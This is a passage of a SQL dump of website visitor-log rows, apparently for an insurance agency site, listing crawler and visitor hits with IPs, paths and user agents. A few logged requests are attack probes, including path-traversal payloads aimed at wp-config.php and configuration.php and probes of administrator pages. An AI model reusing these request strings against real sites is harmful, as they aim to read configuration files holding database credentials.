864','','','','','','0','0',0),(26586,'0b_87011b8e24526047e25741ca4e9e0b4c','1462739357','217.69.133.221','fetcher2-2.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26588,'0b_87011b8e24526047e25741ca4e9e0b4c','1462739359','217.69.133.220','fetcher2-1.p.mail.ru','/SSO/235_14.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26591,'0b_87011b8e24526047e25741ca4e9e0b4c','1462739364','217.69.133.224','fetcher2-5.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26594,'0b_87011b8e24526047e25741ca4e9e0b4c','1462739365','217.69.133.221','fetcher2-2.p.mail.ru','/SSO/235_14.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/SSO/235_14.html','',0,'Linux','','ru','','','','','','','0','0',0),(26595,'0b_7090396477b69ea8ad6dd2508b1fb617','1462741499','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(26597,'0b_6b6418b308d10988abd6f2d0a7b69550','1462742549','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26598,'0b_31805d7e2287fa3dea20a78cc0c49cd1','1462742669','195.154.191.204','195-154-191-204.rev.poneytelecom.eu','/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','3','0',0),(26601,'0b_d29c16d6609e0d2537afb309981a2f86','1462743227','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(26604,'0b_919b047313500f93b7236a425c1600ee','1462743228','141.8.143.235','spider-141-8-143-235.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(26606,'0b_c66199cc5ee114fe461afc4b19ec50c5','1462743338','198.12.125.236','198-12-125-236-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26609,'0b_c66199cc5ee114fe461afc4b19ec50c5','1462743340','198.12.125.236','198-12-125-236-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26612,'0b_d29c16d6609e0d2537afb309981a2f86','1462744302','100.43.81.146','spider-100-43-81-146.yandex.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(26613,'0b_318403b239565b7017e1ee7a2eed7267','1462744941','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)','http://coinsruss.com/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(26615,'0b_318403b239565b7017e1ee7a2eed7267','1462744941','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)','http://coinsruss.com/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(26616,'0b_b445af70b774ced24e8f8d88a5385edf','1462745702','157.55.39.163','msnbot-157-55-39-163.search.msn.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26618,'0b_c91f52f40c3ee29ca3cd5b6ee046e4f3','1462745989','146.52.120.125','ip9234787d.dynamic.kabel-deutschland.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(26619,'0b_c91f52f40c3ee29ca3cd5b6ee046e4f3','1462745991','146.52.120.125','ip9234787d.dynamic.kabel-deutschland.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(26621,'0b_9ce025b68cfd96004dbbd726d3ac675c','1462746027','195.154.191.204','195-154-191-204.rev.poneytelecom.eu','/index.php?jat3action=gzip&type=css&file=configuration.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','3','0',0),(26622,'0b_9ce025b68cfd96004dbbd726d3ac675c','1462746028','195.154.191.204','195-154-191-204.rev.poneytelecom.eu','/?jat3action=gzip&type=css&file=configuration.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','3','0',0),(26625,'0b_33e6cfb85e99b68295e7ed8daeee9a16','1462747523','88.198.230.79','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(26628,'0b_33e6cfb85e99b68295e7ed8daeee9a16','1462747526','88.198.230.79','majestic12.co.uk','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(26630,'0b_33e6cfb85e99b68295e7ed8daeee9a16','1462747527','88.198.230.79','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(26633,'0b_33e6cfb85e99b68295e7ed8daeee9a16','1462747529','88.198.230.79','majestic12.co.uk','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(26634,'0b_33e6cfb85e99b68295e7ed8daeee9a16','1462747533','88.198.230.79','majestic12.co.uk','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(26637,'0b_33e6cfb85e99b68295e7ed8daeee9a16','1462747538','88.198.230.79','majestic12.co.uk','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(26639,'0b_33e6cfb85e99b68295e7ed8daeee9a16','1462747545','88.198.230.79','majestic12.co.uk','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(26640,'0b_33e6cfb85e99b68295e7ed8daeee9a16','1462747547','88.198.230.79','majestic12.co.uk','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(26643,'0b_8aa4519456675e77c9f976d66b2dff5c','1462747659','208.115.111.66','208-115-111-66-reverse.wowrack.com','/members/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(26646,'0b_857c8f2bcf103ce52afe995793c3366c','1462749278','66.249.66.8','crawl-66-249-66-8.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(26648,'0b_eeb65ee7b859eb4af3cdabeb484c5eb7','1462750531','217.69.133.223','fetcher2-4.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26651,'0b_eeb65ee7b859eb4af3cdabeb484c5eb7','1462750533','217.69.133.223','fetcher2-4.p.mail.ru','/main.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26652,'0b_eeb65ee7b859eb4af3cdabeb484c5eb7','1462750535','217.69.133.226','fetcher2-7.p.mail.ru','/','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26655,'0b_eeb65ee7b859eb4af3cdabeb484c5eb7','1462750537','217.69.133.222','fetcher2-3.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26657,'0b_eeb65ee7b859eb4af3cdabeb484c5eb7','1462750539','217.69.133.225','fetcher2-6.p.mail.ru','/main.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/main.html','',0,'Linux','','ru','','','','','','','0','0',0),(26658,'0b_eeb65ee7b859eb4af3cdabeb484c5eb7','1462750543','217.69.133.225','fetcher2-6.p.mail.ru','/','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/','',0,'Linux','','ru','','','','','','','0','0',0),(26661,'0b_c3d89b4c8abb0528ceb269962861d713','1462752004','173.234.153.122','173.234.153.122.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(26664,'0b_c3d89b4c8abb0528ceb269962861d713','1462752004','173.234.153.122','173.234.153.122.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(26666,'0b_ab91706edd43eedec683e561d58d8b44','1462754037','82.211.50.176','82.211.50.176','/register/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(26669,'0b_d911beeaa4829b30f216c5b297e5f23a','1462754037','185.107.24.237','185.107.24.237','/register/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(26672,'0b_945c9ffc261c8a4987b68dd255de217b','1462754086','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(26675,'0b_f142c81595c8cc33bb8669975960b295','1462756224','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(26678,'0b_491686bc7fa096c4d4224108de5f16eb','1462756230','217.69.133.225','fetcher2-6.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26679,'0b_491686bc7fa096c4d4224108de5f16eb','1462756232','217.69.133.220','fetcher2-1.p.mail.ru','/under.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26682,'0b_491686bc7fa096c4d4224108de5f16eb','1462756235','217.69.133.223','fetcher2-4.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26685,'0b_491686bc7fa096c4d4224108de5f16eb','1462756237','217.69.133.221','fetcher2-2.p.mail.ru','/under.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/under.html','',0,'Linux','','ru','','','','','','','0','0',0),(26687,'0b_6a9b0d514ce12246bf9b151fbaa72f1b','1462756437','199.21.113.234','199-21-113-234-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26688,'0b_577425767a61022f337fd9f97a819d31','1462756438','96.8.113.194','96-8-113-194-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26691,'0b_e5716ab639e69a0b55406eb5975e432b','1462756866','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26694,'0b_40263bbb1df1c65930543e396574ab44','1462757926','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26697,'0b_1ecb98f93894645fe9ab41f648055ad1','1462760150','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','','','','','','','0','0',0),(26699,'0b_1ecb98f93894645fe9ab41f648055ad1','1462760155','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','','','','','','','0','0',0),(26700,'0b_377855d257c11799e029a51a02dc1382','1462761924','217.69.133.220','fetcher2-1.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26703,'0b_377855d257c11799e029a51a02dc1382','1462761926','217.69.133.222','fetcher2-3.p.mail.ru','/top.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26705,'0b_377855d257c11799e029a51a02dc1382','1462761929','217.69.133.224','fetcher2-5.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26706,'0b_377855d257c11799e029a51a02dc1382','1462761931','217.69.133.225','fetcher2-6.p.mail.ru','/top.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/top.html','',0,'Linux','','ru','','','','','','','0','0',0),(26708,'0b_377855d257c11799e029a51a02dc1382','1462761946','217.69.133.225','fetcher2-6.p.mail.ru','/sitemap.xml','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26709,'0b_e71f0c6e647ac8109d703701ea13acc7','1462764911','157.55.39.163','msnbot-157-55-39-163.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26712,'0b_5272e319bf10bd3a57d52c4a126f41fa','1462767588','217.69.133.220','fetcher2-1.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26714,'0b_5272e319bf10bd3a57d52c4a126f41fa','1462767590','217.69.133.226','fetcher2-7.p.mail.ru','/companylinks.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26717,'0b_5272e319bf10bd3a57d52c4a126f41fa','1462767594','217.69.133.221','fetcher2-2.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26718,'0b_5272e319bf10bd3a57d52c4a126f41fa','1462767595','217.69.133.222','fetcher2-3.p.mail.ru','/companylinks.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/companylinks.htm','',0,'Linux','','ru','','','','','','','0','0',0),(26721,'0b_05367c497508c97eb39316081509124d','1462767630','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)','http://lover.ru/','',0,'Win2000','IE 5','ua','','','','','','','0','0',0),(26724,'0b_05367c497508c97eb39316081509124d','1462767630','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)','http://lover.ru/','',0,'Win2000','IE 5','ua','','','','','','','0','0',0),(26726,'0b_db5e8ece4bd23fc5a7c3b8594a23ac51','1462770679','180.76.15.156','baiduspider-180-76-15-156.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(26727,'0b_64ae4699562de3e738f506dd69148a9b','1462771267','69.30.221.250','latestdirect.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(26730,'0b_64ae4699562de3e738f506dd69148a9b','1462771270','69.30.221.250','latestdirect.com','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(26733,'0b_f8b2f9e580b34071d99c8074c7bf41e8','1462773645','62.210.97.48','62-210-97-48.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(26736,'0b_f8b2f9e580b34071d99c8074c7bf41e8','1462773648','62.210.97.48','62-210-97-48.rev.poneytelecom.eu','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(26738,'0b_f8b2f9e580b34071d99c8074c7bf41e8','1462773651','62.210.97.48','62-210-97-48.rev.poneytelecom.eu','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(26739,'0b_7c19167675d754a3bf8046225d501177','1462776698','2.121.255.148','0279ff94.bb.sky.com','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(26741,'0b_9d3653f44bfd2ea5d6dcea38cd322927','1462777646','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(26742,'0b_2750d284627a376478d98ae3b931ebce','1462778904','66.249.66.21','crawl-66-249-66-21.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26744,'0b_ec877cb890dc270702f50823ee75208c','1462779018','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26745,'0b_1dfe529ab424c6f808b16469606e464f','1462779428','45.79.81.142','li1180-142.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(26748,'0b_ca4ea261b72429a952d7e624d7a14ac2','1462783020','62.210.152.84','62-210-152-84.rev.poneytelecom.eu','/administrator/index.php','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','eu','','','','','','','3','0',0),(26750,'0b_ca4ea261b72429a952d7e624d7a14ac2','1462783022','62.210.152.84','62-210-152-84.rev.poneytelecom.eu','/administrator/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','eu','','','','','','','3','0',0),(26753,'0b_4c74a41b846ba6103799ac1215575b3b','1462783528','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-status/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(26754,'0b_91b486d07903a3d8d3e27b39cfa0a8c3','1462784205','50.17.89.233','ec2-50-17-89-233.compute-1.amazonaws.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(26756,'0b_4eaf4575ebcc53835dcb2c24ac8631c8','1462784643','217.69.133.223','fetcher2-4.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26757,'0b_4eaf4575ebcc53835dcb2c24ac8631c8','1462784645','217.69.133.220','fetcher2-1.p.mail.ru','/left.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26760,'0b_4eaf4575ebcc53835dcb2c24ac8631c8','1462784647','217.69.133.224','fetcher2-5.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26763,'0b_4eaf4575ebcc53835dcb2c24ac8631c8','1462784649','217.69.133.226','fetcher2-7.p.mail.ru','/left.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/left.html','',0,'Linux','','ru','','','','','','','0','0',0),(26765,'0b_c5d93af947f8cd1fc089ec8845c7837c','1462785406','69.30.205.218','69.30.205.218','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(26766,'0b_c5d93af947f8cd1fc089ec8845c7837c','1462785417','69.30.205.218','69.30.205.218','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(26768,'0b_ce7cdebd599d18e532b4b75b5ee3bf2d','1462786681','180.76.15.155','baiduspider-180-76-15-155.crawl.baidu.com','/forms/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(26771,'0b_252917ca6a4135b77a030746b77c0e8c','1462787419','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(26772,'0b_542bd73a41705f0415daf787ec15abf0','1462787846','66.249.66.14','crawl-66-249-66-14.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26775,'0b_ac2556112ab89f077cd8d197b80b246b','1462787854','66.249.66.12','crawl-66-249-66-12.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(26777,'0b_0d0ab92a38e5b46d704a5b4360b17c6f','1462790578','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)','http://royal-investments.net/','',0,'WinNT','IE 5','','','','','','','','0','0',0),(26778,'0b_0d0ab92a38e5b46d704a5b4360b17c6f','1462790579','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)','http://royal-investments.net/','',0,'WinNT','IE 5','','','','','','','','0','0',0),(26780,'0b_4bcd78d2c81c00d240aa765db790c1b4','1462791783','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26783,'0b_9bdae8e8a81daa5f10fe89cb3b035851','1462793785','46.119.112.172','sol-fttb.172.112.119.46.sovam.net.ua','/contact/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','ua','','','','','','','0','0',0),(26786,'0b_565931b78787d3b6c302758f31594d2b','1462795460','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)','http://avtocredit-legko.ru/','',0,'WinVista','IE 7','','','','','','','','0','0',0),(26787,'0b_7720e9079ff8d24f7a18277431dc1db1','1462798254','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26790,'0b_c6851fdcfa05afb5ec6b425ca35ebc6f','1462798871','5.9.89.170','static.170.89.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(26793,'0b_c6851fdcfa05afb5ec6b425ca35ebc6f','1462798874','5.9.89.170','static.170.89.9.5.clients.your-server.de','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(26796,'0b_c6851fdcfa05afb5ec6b425ca35ebc6f','1462798875','5.9.89.170','static.170.89.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(26798,'0b_c6851fdcfa05afb5ec6b425ca35ebc6f','1462798877','5.9.89.170','static.170.89.9.5.clients.your-server.de','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; 